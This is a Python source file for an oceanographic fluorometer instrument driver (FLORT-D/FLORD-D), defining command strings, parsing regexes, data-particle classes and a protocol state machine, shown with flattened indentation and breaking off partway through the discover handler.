#!/usr/bin/env python
# coding=utf-8
"""
@package mi.instrument.wetlabs.fluorometer.flort_d.driver
@file marine-integrations/mi/instrument/wetlabs/fluorometer/flort_d/driver.py
@author Art Teranishi
@brief Driver for the flort_d
Release notes:
Initial development
"""
import datetime
import time
import re
from mi.core.log import get_logger
from mi.core.common import BaseEnum, Units
from mi.core.util import dict_equal
from mi.core.exceptions import SampleException
from mi.core.exceptions import InstrumentParameterException
from mi.core.exceptions import InstrumentTimeoutException
from mi.core.exceptions import InstrumentCommandException
from mi.core.instrument.instrument_protocol import CommandResponseInstrumentProtocol, InitializationType
from mi.core.instrument.instrument_fsm import InstrumentFSM
from mi.core.instrument.instrument_driver import SingleConnectionInstrumentDriver
from mi.core.instrument.instrument_driver import DriverEvent
from mi.core.instrument.instrument_driver import DriverAsyncEvent
from mi.core.instrument.instrument_driver import DriverProtocolState
from mi.core.instrument.instrument_driver import DriverParameter
from mi.core.instrument.instrument_driver import DriverConfigKey
from mi.core.instrument.data_particle import DataParticle
from mi.core.instrument.data_particle import DataParticleKey
from mi.core.instrument.data_particle import CommonDataParticleType
from mi.core.instrument.chunker import StringChunker
from mi.core.instrument.protocol_param_dict import ParameterDictVisibility
from mi.core.instrument.protocol_param_dict import ParameterDictType
from mi.core.instrument.driver_dict import DriverDictKey
from mi.core.driver_scheduler import DriverSchedulerConfigKey
from mi.core.driver_scheduler import TriggerType
from mi.core.time_tools import get_timestamp_delayed
from mi.core.log import get_logging_metaclass
__author__ = 'Rachel Manoni'
__license__ = 'Apache 2.0'
log = get_logger()
NEWLINE = '\r\n'
TIMEOUT = 30
DISCOVER_TIMEOUT = 20
FLORT_CLASS = 'flort'
STATUS_TIMEOUT = 10
SAMPLE_TIMEOUT = 10
###
# Driver Constant Definitions
###
class ParameterUnit(BaseEnum):
COUNTS = 'counts'
TIME_INTERVAL = 'HH:MM:SS'
DATE_INTERVAL = 'MM:DD:YY'
PARTS_PER_MILLION = 'ppm'
MICROGRAMS_PER_LITER = 'µg/L'
PART_PER_METER_STERADIAN = '1/(m • sr)'
class DataParticleType(BaseEnum):
"""
Data particle types produced by this driver
"""
RAW = CommonDataParticleType.RAW
FLORTD_MNU = 'flort_d_status'
FLORDD_MNU = 'flord_d_status'
FLORTD_SAMPLE = 'flort_d_data_record'
FLORDD_SAMPLE = 'flord_d_data_record'
class ProtocolState(BaseEnum):
"""
Instrument protocol states
"""
UNKNOWN = DriverProtocolState.UNKNOWN
COMMAND = DriverProtocolState.COMMAND
AUTOSAMPLE = DriverProtocolState.AUTOSAMPLE
DIRECT_ACCESS = DriverProtocolState.DIRECT_ACCESS
class ProtocolEvent(BaseEnum):
"""
Protocol events
"""
ENTER = DriverEvent.ENTER
EXIT = DriverEvent.EXIT
GET = DriverEvent.GET
SET = DriverEvent.SET
DISCOVER = DriverEvent.DISCOVER
START_DIRECT = DriverEvent.START_DIRECT
STOP_DIRECT = DriverEvent.STOP_DIRECT
START_AUTOSAMPLE = DriverEvent.START_AUTOSAMPLE
STOP_AUTOSAMPLE = DriverEvent.STOP_AUTOSAMPLE
EXECUTE_DIRECT = DriverEvent.EXECUTE_DIRECT
CLOCK_SYNC = DriverEvent.CLOCK_SYNC
RUN_WIPER = 'PROTOCOL_EVENT_RUN_WIPER'
RUN_WIPER_SCHEDULED = 'PROTOCOL_EVENT_RUN_WIPER_SCHEDULED'
SCHEDULED_CLOCK_SYNC = DriverEvent.SCHEDULED_CLOCK_SYNC
ACQUIRE_SAMPLE = DriverEvent.ACQUIRE_SAMPLE
SCHEDULED_ACQUIRE_STATUS = 'PROTOCOL_EVENT_SCHEDULED_ACQUIRE_STATUS'
ACQUIRE_STATUS = DriverEvent.ACQUIRE_STATUS
class Capability(BaseEnum):
"""
Protocol events that should be exposed to users (subset of above).
"""
RUN_WIPER = ProtocolEvent.RUN_WIPER
CLOCK_SYNC = ProtocolEvent.CLOCK_SYNC
DISCOVER = ProtocolEvent.DISCOVER
ACQUIRE_SAMPLE = ProtocolEvent.ACQUIRE_SAMPLE
START_AUTOSAMPLE = ProtocolEvent.START_AUTOSAMPLE
STOP_AUTOSAMPLE = ProtocolEvent.STOP_AUTOSAMPLE
START_DIRECT = ProtocolEvent.START_DIRECT
STOP_DIRECT = ProtocolEvent.STOP_DIRECT
ACQUIRE_STATUS = ProtocolEvent.ACQUIRE_STATUS
GET = DriverEvent.GET
SET = DriverEvent.SET
class Parameter(DriverParameter):
"""
Parameters for the dictionary
"""
# Device specific parameters.
MEASUREMENTS_PER_REPORTED = "ave" # Measurements per reported value int
MEASUREMENT_1_DARK_COUNT = "m1d" # Measurement 1 dark count int
MEASUREMENT_1_SLOPE = "m1s" # Measurement 1 slope value float
MEASUREMENT_2_DARK_COUNT = "m2d" # Measurement 2 dark count int
MEASUREMENT_2_SLOPE = "m2s" # Measurement 2 slope value float
MEASUREMENT_3_DARK_COUNT = "m3d" # Measurement 3 dark count int
MEASUREMENT_3_SLOPE = "m3s" # Measurement 3 slope value float
MEASUREMENTS_PER_PACKET = "pkt" # Measurements per packet int
BAUD_RATE = "rat" # Baud rate int
PACKETS_PER_SET = "set" # Packets per set int
PREDEFINED_OUTPUT_SEQ = "seq" # Predefined output sequence int
RECORDING_MODE = "rec" # Recording mode int
MANUAL_MODE = "man" # Manual mode int
SAMPLING_INTERVAL = "int" # Sampling interval str
DATE = "dat" # Date str
TIME = "clk" # Time str
MANUAL_START_TIME = "mst" # Manual start time str
# Hardware Data
SERIAL_NUM = "ser" # Serial number str
FIRMWARE_VERSION = "ver" # Firmware version str
INTERNAL_MEMORY = "mem" # Internal memory int
# Engineering param
RUN_WIPER_INTERVAL = "wiper_interval" # Interval to schedule running wiper str
RUN_CLOCK_SYNC_INTERVAL = 'clk_interval' # Interval to schedule syncing clock str
RUN_ACQUIRE_STATUS_INTERVAL = 'status_interval' # Interval to schedule status str
class ScheduledJob(BaseEnum):
"""
List of jobs to be scheduled
"""
RUN_WIPER = 'run_wiper'
CLOCK_SYNC = 'clock_sync'
ACQUIRE_STATUS = 'acquire_status'
class Prompt(BaseEnum):
"""
Device I/O prompts.
FLORT-D does not have a prompt.
"""
class InstrumentCommand(BaseEnum):
"""
Commands sent to the instrument
"""
# Instrument command strings
INTERRUPT_INSTRUMENT = "!!!!!"
PRINT_METADATA = "$met"
PRINT_MENU = "$mnu"
RUN_SETTINGS = "$run"
RUN_WIPER = "$mvs"
# placeholder for all parameters
SET = 'set'
###############################################################################
# Data Particles
###############################################################################
MNU_REGEX = r"(Ser.*?Mem\s[0-9]{1,6})"
MNU_REGEX_MATCHER = re.compile(MNU_REGEX, re.DOTALL)
RUN_REGEX = r"(mvs\s[0-1]\r\n)"
RUN_REGEX_MATCHER = re.compile(RUN_REGEX, re.DOTALL)
MET_REGEX = r"(Sig_1\S*).*?(Sig_2\S*).*?(Sig_3,counts,,SO,\S*?,\d+)"
MET_REGEX_MATCHER = re.compile(MET_REGEX, re.DOTALL)
TIME_INTERVAL = r"blahblahblahfakeregexdon'tmatchme"
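# The engineering-parameter intervals (wiper, clock sync, acquire status) exist only on the
# driver side; the deliberately non-matching pattern above keeps them from ever being
# overwritten by text parsed from instrument output.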
FLORD_SAMPLE_REGEX = r"(\d+/\d+/\d+\s+\d+:\d+:\d+(\s+-?\d+){5}\r\n)"
FLORD_SAMPLE_REGEX_MATCHER = re.compile(FLORD_SAMPLE_REGEX)
FLORT_SAMPLE_REGEX = r"(\d+/\d+/\d+\s+\d+:\d+:\d+(\s+-?\d+){7}\r\n)"
FLORT_SAMPLE_REGEX_MATCHER = re.compile(FLORT_SAMPLE_REGEX)
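# Illustrative only -- the values below are hypothetical, not captured from an instrument.
# The sample matchers above expect tab-delimited records of the form:
#   FLORD: mm/dd/yy<TAB>HH:MM:SS followed by 5 integers (wave_beta, sig_beta, wave_chl, sig_chl, temp)
#   FLORT: mm/dd/yy<TAB>HH:MM:SS followed by 7 integers (adds the wave_cdom and sig_cdom pair)
# e.g. '07/16/13\t09:33:06\t700\t4130\t695\t1018\t460\t4130\t525\r\n' matches FLORT_SAMPLE_REGEX.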
class FlordMenuParticleKey(BaseEnum):
SERIAL_NUM = "serial_number"
FIRMWARE_VER = "firmware_version"
AVE = "number_measurements_per_reported_value"
PKT = "number_of_reported_values_per_packet"
M1D = "measurement_1_dark_count_value"
M2D = "measurement_2_dark_count_value"
M1S = "measurement_1_slope_value"
M2S = "measurement_2_slope_value"
SEQ = "predefined_output_sequence"
RAT = "baud_rate"
SET = "number_of_packets_per_set"
REC = "recording_mode"
MAN = "manual_mode"
INT = "sampling_interval"
DAT = "date"
CLK = "clock"
MST = "manual_start_time"
MEM = "internal_memory"
class FlortMenuParticleKey(FlordMenuParticleKey):
M3D = "measurement_3_dark_count_value"
M3S = "measurement_3_slope_value"
class FlordMenuParticle(DataParticle):
"""
Routines for parsing raw data into a data particle structure. Override
the building of values, and the rest comes along for free.
"""
_data_particle_type = DataParticleType.FLORDD_MNU
LINE01 = r"Ser\s*(\S*)"
LINE02 = r"Ver\s*(\S*)"
LINE03 = r"Ave\s*(\S*)"
LINE04 = r"Pkt\s*(\S*)"
LINE05 = r"M1d\s*(\S*)"
LINE06 = r"M2d\s*(\S*)"
LINE08 = r"M1s\s*(\S*)"
LINE09 = r"M2s\s*(\S*)"
LINE11 = r"Seq\s*(\S*)"
LINE12 = r"Rat\s*(\S*)"
LINE13 = r"Set\s*(\S*)"
LINE14 = r"Rec\s*(\S*)"
LINE15 = r"Man\s*(\S*)"
LINE16 = r"Int\s*(\S*)"
LINE17 = r"Dat\s*(\S*)"
LINE18 = r"Clk\s*(\S*)"
LINE19 = r"Mst\s*(\S*)"
LINE20 = r"Mem\s*(\S*)"
def _build_parsed_values(self):
"""
Take something in the StatusData format and split it into
values with appropriate tags
@throws SampleException If there is a problem with sample creation
"""
log.debug("FlordDMNU raw data = %r", self.raw_data)
try:
serial_num = str(re.compile(self.LINE01).search(self.raw_data).group(1))
firmware_ver = str(re.compile(self.LINE02).search(self.raw_data).group(1))
ave = int(re.compile(self.LINE03).search(self.raw_data).group(1))
pkt = int(re.compile(self.LINE04).search(self.raw_data).group(1))
m1d = int(re.compile(self.LINE05).search(self.raw_data).group(1))
m2d = int(re.compile(self.LINE06).search(self.raw_data).group(1))
m1s = float(re.compile(self.LINE08).search(self.raw_data).group(1))
m2s = float(re.compile(self.LINE09).search(self.raw_data).group(1))
seq = int(re.compile(self.LINE11).search(self.raw_data).group(1))
rat = int(re.compile(self.LINE12).search(self.raw_data).group(1))
setv = int(re.compile(self.LINE13).search(self.raw_data).group(1))
rec = int(re.compile(self.LINE14).search(self.raw_data).group(1))
man = int(re.compile(self.LINE15).search(self.raw_data).group(1))
interval = str(re.compile(self.LINE16).search(self.raw_data).group(1))
dat = str(re.compile(self.LINE17).search(self.raw_data).group(1))
clk = str(re.compile(self.LINE18).search(self.raw_data).group(1))
mst = str(re.compile(self.LINE19).search(self.raw_data).group(1))
mem = int(re.compile(self.LINE20).search(self.raw_data).group(1))
month, day, year = dat.split('/')
hours, mins, seconds = clk.split(':')
try:
dt = datetime.datetime(2000 + int(year), int(month), int(day), int(hours), int(mins), int(seconds))
ntp_ts = (dt - datetime.datetime(1900, 1, 1)).total_seconds()
self.set_internal_timestamp(ntp_ts)
except ValueError:
log.exception('Unable to decode timestamp in FlordDMNU particle')
result = [{DataParticleKey.VALUE_ID: FlordMenuParticleKey.SERIAL_NUM, DataParticleKey.VALUE: serial_num},
{DataParticleKey.VALUE_ID: FlordMenuParticleKey.FIRMWARE_VER,
DataParticleKey.VALUE: firmware_ver},
{DataParticleKey.VALUE_ID: FlordMenuParticleKey.AVE, DataParticleKey.VALUE: ave},
{DataParticleKey.VALUE_ID: FlordMenuParticleKey.PKT, DataParticleKey.VALUE: pkt},
{DataParticleKey.VALUE_ID: FlordMenuParticleKey.M1D, DataParticleKey.VALUE: m1d},
{DataParticleKey.VALUE_ID: FlordMenuParticleKey.M2D, DataParticleKey.VALUE: m2d},
{DataParticleKey.VALUE_ID: FlordMenuParticleKey.M1S, DataParticleKey.VALUE: m1s},
{DataParticleKey.VALUE_ID: FlordMenuParticleKey.M2S, DataParticleKey.VALUE: m2s},
{DataParticleKey.VALUE_ID: FlordMenuParticleKey.SEQ, DataParticleKey.VALUE: seq},
{DataParticleKey.VALUE_ID: FlordMenuParticleKey.RAT, DataParticleKey.VALUE: rat},
{DataParticleKey.VALUE_ID: FlordMenuParticleKey.SET, DataParticleKey.VALUE: setv},
{DataParticleKey.VALUE_ID: FlordMenuParticleKey.REC, DataParticleKey.VALUE: rec},
{DataParticleKey.VALUE_ID: FlordMenuParticleKey.MAN, DataParticleKey.VALUE: man},
{DataParticleKey.VALUE_ID: FlordMenuParticleKey.INT, DataParticleKey.VALUE: interval},
{DataParticleKey.VALUE_ID: FlordMenuParticleKey.DAT, DataParticleKey.VALUE: dat},
{DataParticleKey.VALUE_ID: FlordMenuParticleKey.CLK, DataParticleKey.VALUE: clk},
{DataParticleKey.VALUE_ID: FlordMenuParticleKey.MST, DataParticleKey.VALUE: mst},
{DataParticleKey.VALUE_ID: FlordMenuParticleKey.MEM, DataParticleKey.VALUE: mem}]
log.debug('FlordDMNU parsed particle = %r', result)
return result
except Exception:
raise SampleException('Error building FlordDMNU_Particle')
class FlortMenuParticle(FlordMenuParticle):
"""
Routines for parsing raw data into a data particle structure. Override
the building of values, and the rest comes along for free.
"""
_data_particle_type = DataParticleType.FLORTD_MNU
LINE07 = r"M3d\s*(\S*)"
LINE10 = r"M3s\s*(\S*)"
def _build_parsed_values(self):
"""
Take something in the StatusData format and split it into
values with appropriate tags
@throws SampleException If there is a problem with sample creation
"""
log.debug("FlortDMNU_Particle _build_parsed_values enter...")
log.debug("FlortDMNU raw data = %r", self.raw_data)
try:
result = super(FlortMenuParticle, self)._build_parsed_values()
m3d = int(re.compile(self.LINE07).search(self.raw_data).group(1))
m3s = float(re.compile(self.LINE10).search(self.raw_data).group(1))
result.append({DataParticleKey.VALUE_ID: FlortMenuParticleKey.M3D, DataParticleKey.VALUE: m3d})
result.append({DataParticleKey.VALUE_ID: FlortMenuParticleKey.M3S, DataParticleKey.VALUE: m3s})
log.debug('FlortDMNU parsed particle = %r', result)
return result
except ValueError:
raise SampleException('Error building FlortDMNU_Particle')
class FlordSampleParticleKey(BaseEnum):
date_string = 'date_string'
time_string = 'time_string'
wave_beta = 'measurement_wavelength_beta'
raw_sig_beta = 'raw_signal_beta'
wave_chl = 'measurement_wavelength_chl'
raw_sig_chl = 'raw_signal_chl'
raw_temp = 'raw_internal_temp'
# The following values come from the $met command. They never change, so they are
# captured once at initialization and reused for every subsequent sample.
SIG_1_SCALE_FACTOR = 'signal_1_scale_factor'
SIG_1_OFFSET = 'signal_1_offset'
SIG_2_SCALE_FACTOR = 'signal_2_scale_factor'
SIG_2_OFFSET = 'signal_2_offset'
class FlortSampleParticleKey(FlordSampleParticleKey):
wave_cdom = 'measurement_wavelength_cdom'
raw_sig_cdom = 'raw_signal_cdom'
# The following values come from the $met command. They never change, so they are
# captured once at initialization and reused for every subsequent sample.
SIG_3_SCALE_FACTOR = 'signal_3_scale_factor'
SIG_3_OFFSET = 'signal_3_offset'
class FlordSampleParticle(DataParticle):
"""
Routines for parsing raw data into a data particle structure. Override
the building of values, and the rest should come along for free.
"""
_data_particle_type = DataParticleType.FLORDD_SAMPLE
_compiled_regex = None
sig_1_offset = 0
sig_1_scale = 0
sig_2_offset = 0
sig_2_scale = 0
ntp_epoch = datetime.datetime(1900, 1, 1)
@staticmethod
def regex_compiled():
"""
get the compiled regex pattern
@return: compiled re
"""
if FlordSampleParticle._compiled_regex is None:
FlordSampleParticle._compiled_regex = re.compile(FlordSampleParticle.regex())
return FlordSampleParticle._compiled_regex
@staticmethod
def regex():
"""
Regular expression to match a sample pattern
@return: regex string
"""
return FLORD_SAMPLE_REGEX
def _build_parsed_values(self):
"""
Take something in the StatusData format and split it into
values with appropriate tags
@throws SampleException If there is a problem with sample creation
"""
log.debug("raw data = %r", self.raw_data)
match = FlordSampleParticle.regex_compiled().search(self.raw_data)
if not match:
raise SampleException("No regex match of parsed sample data: [%s]" % self.raw_data)
try:
split_data = match.group(0).split('\t')
date_str = str(split_data[0])
time_str = str(split_data[1])
wave_beta = int(split_data[2])
raw_sig_beta = int(split_data[3])
wave_chl = int(split_data[4])
raw_sig_chl = int(split_data[5])
raw_temp = int(split_data[6])
month, day, year = date_str.split('/')
hours, mins, secs = time_str.split(':')
month = int(month)
day = int(day)
year = int(year) + 2000
hours = int(hours)
mins = int(mins)
secs = int(secs)
except ValueError:
raise SampleException('FlordSampleParticle: could not parse sample data')
record_time = datetime.datetime(year, month, day, hours, mins, secs)
self.set_internal_timestamp(timestamp=(record_time - self.ntp_epoch).total_seconds())
result = [{DataParticleKey.VALUE_ID: FlortSampleParticleKey.date_string, DataParticleKey.VALUE: date_str},
{DataParticleKey.VALUE_ID: FlortSampleParticleKey.time_string, DataParticleKey.VALUE: time_str},
{DataParticleKey.VALUE_ID: FlortSampleParticleKey.wave_beta, DataParticleKey.VALUE: wave_beta},
{DataParticleKey.VALUE_ID: FlortSampleParticleKey.raw_sig_beta, DataParticleKey.VALUE: raw_sig_beta},
{DataParticleKey.VALUE_ID: FlortSampleParticleKey.wave_chl, DataParticleKey.VALUE: wave_chl},
{DataParticleKey.VALUE_ID: FlortSampleParticleKey.raw_sig_chl, DataParticleKey.VALUE: raw_sig_chl},
{DataParticleKey.VALUE_ID: FlortSampleParticleKey.raw_temp, DataParticleKey.VALUE: raw_temp},
{DataParticleKey.VALUE_ID: FlortSampleParticleKey.SIG_1_OFFSET,
DataParticleKey.VALUE: FlortSampleParticle.sig_1_offset},
{DataParticleKey.VALUE_ID: FlortSampleParticleKey.SIG_1_SCALE_FACTOR,
DataParticleKey.VALUE: FlortSampleParticle.sig_1_scale},
{DataParticleKey.VALUE_ID: FlortSampleParticleKey.SIG_2_OFFSET,
DataParticleKey.VALUE: FlortSampleParticle.sig_2_offset},
{DataParticleKey.VALUE_ID: FlortSampleParticleKey.SIG_2_SCALE_FACTOR,
DataParticleKey.VALUE: FlortSampleParticle.sig_2_scale}]
log.debug('parsed particle = %r', result)
return result
class FlortSampleParticle(DataParticle):
"""
Routines for parsing raw data into a data particle structure. Override
the building of values, and the rest should come along for free.
"""
_data_particle_type = DataParticleType.FLORTD_SAMPLE
_compiled_regex = None
sig_1_offset = 0
sig_1_scale = 0
sig_2_offset = 0
sig_2_scale = 0
sig_3_offset = 0
sig_3_scale = 0
ntp_epoch = datetime.datetime(1900, 1, 1)
@staticmethod
def regex_compiled():
"""
get the compiled regex pattern
@return: compiled re
"""
if FlortSampleParticle._compiled_regex is None:
FlortSampleParticle._compiled_regex = re.compile(FlortSampleParticle.regex())
return FlortSampleParticle._compiled_regex
@staticmethod
def regex():
"""
Regular expression to match a sample pattern
@return: regex string
"""
return FLORT_SAMPLE_REGEX
def _build_parsed_values(self):
"""
Take something in the StatusData format and split it into
values with appropriate tags
@throws SampleException If there is a problem with sample creation
"""
log.debug("raw data = %r", self.raw_data)
match = FlortSampleParticle.regex_compiled().search(self.raw_data)
if not match:
raise SampleException("No regex match of parsed sample data: [%s]" % self.raw_data)
try:
split_data = match.group(0).split('\t')
date_str = str(split_data[0])
time_str = str(split_data[1])
wave_beta = int(split_data[2])
raw_sig_beta = int(split_data[3])
wave_chl = int(split_data[4])
raw_sig_chl = int(split_data[5])
wave_cdom = int(split_data[6])
raw_sig_cdom = int(split_data[7])
raw_temp = int(split_data[8])
month, day, year = date_str.split('/')
hours, mins, secs = time_str.split(':')
month = int(month)
day = int(day)
year = int(year) + 2000
hours = int(hours)
mins = int(mins)
secs = int(secs)
except Exception:
raise SampleException('FlortSampleParticle: could not parse sample data')
record_time = datetime.datetime(year, month, day, hours, mins, secs)
self.set_internal_timestamp(timestamp=(record_time - self.ntp_epoch).total_seconds())
result = [{DataParticleKey.VALUE_ID: FlortSampleParticleKey.date_string, DataParticleKey.VALUE: date_str},
{DataParticleKey.VALUE_ID: FlortSampleParticleKey.time_string, DataParticleKey.VALUE: time_str},
{DataParticleKey.VALUE_ID: FlortSampleParticleKey.wave_beta, DataParticleKey.VALUE: wave_beta},
{DataParticleKey.VALUE_ID: FlortSampleParticleKey.raw_sig_beta, DataParticleKey.VALUE: raw_sig_beta},
{DataParticleKey.VALUE_ID: FlortSampleParticleKey.wave_chl, DataParticleKey.VALUE: wave_chl},
{DataParticleKey.VALUE_ID: FlortSampleParticleKey.raw_sig_chl, DataParticleKey.VALUE: raw_sig_chl},
{DataParticleKey.VALUE_ID: FlortSampleParticleKey.wave_cdom, DataParticleKey.VALUE: wave_cdom},
{DataParticleKey.VALUE_ID: FlortSampleParticleKey.raw_sig_cdom, DataParticleKey.VALUE: raw_sig_cdom},
{DataParticleKey.VALUE_ID: FlortSampleParticleKey.raw_temp, DataParticleKey.VALUE: raw_temp},
{DataParticleKey.VALUE_ID: FlortSampleParticleKey.SIG_1_OFFSET,
DataParticleKey.VALUE: FlortSampleParticle.sig_1_offset},
{DataParticleKey.VALUE_ID: FlortSampleParticleKey.SIG_1_SCALE_FACTOR,
DataParticleKey.VALUE: FlortSampleParticle.sig_1_scale},
{DataParticleKey.VALUE_ID: FlortSampleParticleKey.SIG_2_OFFSET,
DataParticleKey.VALUE: FlortSampleParticle.sig_2_offset},
{DataParticleKey.VALUE_ID: FlortSampleParticleKey.SIG_2_SCALE_FACTOR,
DataParticleKey.VALUE: FlortSampleParticle.sig_2_scale},
{DataParticleKey.VALUE_ID: FlortSampleParticleKey.SIG_3_OFFSET,
DataParticleKey.VALUE: FlortSampleParticle.sig_3_offset},
{DataParticleKey.VALUE_ID: FlortSampleParticleKey.SIG_3_SCALE_FACTOR,
DataParticleKey.VALUE: FlortSampleParticle.sig_3_scale}]
log.debug('parsed particle = %r', result)
return result
###############################################################################
# Driver
###############################################################################
class InstrumentDriver(SingleConnectionInstrumentDriver):
"""
InstrumentDriver subclass
Subclasses SingleConnectionInstrumentDriver with connection state
machine.
"""
########################################################################
# Superclass overrides for resource query.
########################################################################
@staticmethod
def get_resource_params():
"""
Return list of device parameters available.
"""
return Parameter.list()
########################################################################
# Protocol builder.
########################################################################
def _build_protocol(self):
"""
Construct the driver protocol state machine.
"""
self._protocol = Protocol(Prompt, NEWLINE, self._driver_event)
###########################################################################
# Protocol
###########################################################################
# noinspection PyUnusedLocal
class Protocol(CommandResponseInstrumentProtocol):
"""
Instrument protocol class
Subclasses CommandResponseInstrumentProtocol
"""
__instrument_class__ = FLORT_CLASS
__metaclass__ = get_logging_metaclass(log_level='debug')
def __init__(self, prompts, newline, driver_event):
"""
Protocol constructor.
@param prompts A BaseEnum class containing instrument prompts.
@param newline The newline.
@param driver_event Driver process event callback.
"""
# Construct protocol superclass.
CommandResponseInstrumentProtocol.__init__(self, prompts, newline, driver_event)
# Build protocol state machine.
self._protocol_fsm = InstrumentFSM(ProtocolState, ProtocolEvent,
ProtocolEvent.ENTER, ProtocolEvent.EXIT)
# Add event handlers for protocol state machine.
self._protocol_fsm.add_handler(ProtocolState.UNKNOWN, ProtocolEvent.ENTER, self._handler_unknown_enter)
self._protocol_fsm.add_handler(ProtocolState.UNKNOWN, ProtocolEvent.EXIT, self._handler_unknown_exit)
self._protocol_fsm.add_handler(ProtocolState.UNKNOWN, ProtocolEvent.DISCOVER, self._handler_unknown_discover)
self._protocol_fsm.add_handler(ProtocolState.COMMAND, ProtocolEvent.ENTER, self._handler_command_enter)
self._protocol_fsm.add_handler(ProtocolState.COMMAND, ProtocolEvent.EXIT, self._handler_command_exit)
self._protocol_fsm.add_handler(ProtocolState.COMMAND, ProtocolEvent.START_DIRECT,
self._handler_command_start_direct)
self._protocol_fsm.add_handler(ProtocolState.COMMAND, ProtocolEvent.GET, self._handler_command_get)
self._protocol_fsm.add_handler(ProtocolState.COMMAND, ProtocolEvent.SET, self._handler_command_set)
self._protocol_fsm.add_handler(ProtocolState.COMMAND, ProtocolEvent.START_AUTOSAMPLE,
self._handler_command_start_autosample)
self._protocol_fsm.add_handler(ProtocolState.COMMAND, ProtocolEvent.ACQUIRE_STATUS,
self._handler_command_acquire_status)
self._protocol_fsm.add_handler(ProtocolState.COMMAND, ProtocolEvent.RUN_WIPER, self._handler_command_run_wiper)
self._protocol_fsm.add_handler(ProtocolState.COMMAND, ProtocolEvent.CLOCK_SYNC,
self._handler_command_clock_sync)
self._protocol_fsm.add_handler(ProtocolState.COMMAND, ProtocolEvent.ACQUIRE_SAMPLE,
self._handler_command_acquire_sample)
self._protocol_fsm.add_handler(ProtocolState.AUTOSAMPLE, ProtocolEvent.ENTER, self._handler_autosample_enter)
self._protocol_fsm.add_handler(ProtocolState.AUTOSAMPLE, ProtocolEvent.EXIT, self._handler_autosample_exit)
self._protocol_fsm.add_handler(ProtocolState.AUTOSAMPLE, ProtocolEvent.STOP_AUTOSAMPLE,
self._handler_autosample_stop_autosample)
self._protocol_fsm.add_handler(ProtocolState.AUTOSAMPLE, ProtocolEvent.RUN_WIPER_SCHEDULED,
self._handler_autosample_run_wiper)
self._protocol_fsm.add_handler(ProtocolState.AUTOSAMPLE, ProtocolEvent.SCHEDULED_CLOCK_SYNC,
self._handler_autosample_clock_sync)
self._protocol_fsm.add_handler(ProtocolState.AUTOSAMPLE, ProtocolEvent.SCHEDULED_ACQUIRE_STATUS,
self._handler_autosample_acquire_status)
# GET is only used for configuring the driver when it discovers that it is in AUTOSAMPLE
# will not be shown on the State Diagram
self._protocol_fsm.add_handler(ProtocolState.AUTOSAMPLE, ProtocolEvent.GET, self._handler_command_get)
self._protocol_fsm.add_handler(ProtocolState.DIRECT_ACCESS, ProtocolEvent.ENTER,
self._handler_direct_access_enter)
self._protocol_fsm.add_handler(ProtocolState.DIRECT_ACCESS, ProtocolEvent.EXIT,
self._handler_direct_access_exit)
self._protocol_fsm.add_handler(ProtocolState.DIRECT_ACCESS, ProtocolEvent.STOP_DIRECT,
self._handler_direct_access_stop_direct)
self._protocol_fsm.add_handler(ProtocolState.DIRECT_ACCESS, ProtocolEvent.EXECUTE_DIRECT,
self._handler_direct_access_execute_direct)
# Construct the parameter dictionary containing device parameters,
# current parameter values, and set formatting functions.
self._build_param_dict()
self._build_command_dict()
self._build_driver_dict()
# Add build handlers for device commands.
self._add_build_handler(InstrumentCommand.INTERRUPT_INSTRUMENT, self._build_no_eol_command)
self._add_build_handler(InstrumentCommand.SET, self._build_single_parameter_command)
self._add_build_handler(InstrumentCommand.RUN_SETTINGS, self._build_simple_command)
self._add_build_handler(InstrumentCommand.PRINT_METADATA, self._build_simple_command)
self._add_build_handler(InstrumentCommand.PRINT_MENU, self._build_simple_command)
self._add_build_handler(InstrumentCommand.RUN_WIPER, self._build_simple_command)
# all commands return an 'unrecognized command' response if not recognized by the instrument
self._add_response_handler(InstrumentCommand.INTERRUPT_INSTRUMENT, self._parse_command_response)
self._add_response_handler(InstrumentCommand.SET, self._parse_command_response)
self._add_response_handler(InstrumentCommand.RUN_SETTINGS, self._parse_command_response)
self._add_response_handler(InstrumentCommand.PRINT_METADATA, self._parse_metadata_response)
self._add_response_handler(InstrumentCommand.PRINT_MENU, self._parse_command_response)
self._add_response_handler(InstrumentCommand.RUN_WIPER, self._parse_run_wiper_response)
# commands sent to device to be filtered in responses for telnet DA
self._sent_cmds = []
self._chunker = StringChunker(Protocol.sieve_function)
# Start the state machine in the UNKNOWN state.
self._protocol_fsm.start(ProtocolState.UNKNOWN)
self.initialize_scheduler()
@staticmethod
def sieve_function(raw_data):
"""
The method that splits samples
:param raw_data:
"""
return_list = []
sieve_match = [MNU_REGEX_MATCHER,
RUN_REGEX_MATCHER,
MET_REGEX_MATCHER,
FLORD_SAMPLE_REGEX_MATCHER,
FLORT_SAMPLE_REGEX_MATCHER]
for matcher in sieve_match:
for match in matcher.finditer(raw_data):
return_list.append((match.start(), match.end()))
return return_list
def _filter_capabilities(self, events):
"""
Return a list of currently available capabilities.
"""
return [x for x in events if Capability.has(x)]
@staticmethod
def _parse_command_response(response, prompt):
"""
Instrument will send an 'unrecognized command' response if
an error occurred while sending a command.
Raise an exception if this occurs.
"""
if 'unrecognized command' in response:
raise InstrumentCommandException('unrecognized command')
return response
@staticmethod
def _parse_run_wiper_response(response, prompt):
"""
After running wiper command, the instrument will send an 'unrecognized command' if the command
was not received correctly. Instrument will send a 'mvs 0' if the wiper does not complete
its action. Raise an exception if either occurs.
"""
if 'unrecognized command' in response:
raise InstrumentCommandException('unrecognized command')
if '0' in response:
raise InstrumentCommandException('run wiper was not successful')
return response
@staticmethod
def _parse_metadata_response(response, prompt):
match = MET_REGEX_MATCHER.search(response)
if not match:
raise SampleException("No regex match of metadata data: [%r]" %
response)
try:
sig_1_data = match.group(1)
data = sig_1_data.split(',')
FlortSampleParticle.sig_1_offset = int(data[5])
FlortSampleParticle.sig_1_scale = float(data[4])
sig_2_data = match.group(2)
data = sig_2_data.split(',')
FlortSampleParticle.sig_2_offset = int(data[5])
FlortSampleParticle.sig_2_scale = float(data[4])
sig_3_data = match.group(3)
data = sig_3_data.split(',')
FlortSampleParticle.sig_3_offset = int(data[5])
FlortSampleParticle.sig_3_scale = float(data[4])
except Exception:
raise SampleException('Error parsing particle FlortDMET_Particle')
return response
########################################################################
# Unknown handlers.
########################################################################
def _handler_unknown_enter(self, *args, **kwargs):
"""
Entering Unknown state
"""
# Tell driver superclass to send a state change event.
# Superclass will query the state.
self._driver_event(DriverAsyncEvent.STATE_CHANGE)
@staticmethod
def _handler_unknown_exit(*args, **kwargs):
"""
Exiting Unknown state
"""
pass
def _handler_unknown_discover(self, *args, **kwargs):
"""
Discover current state
"""
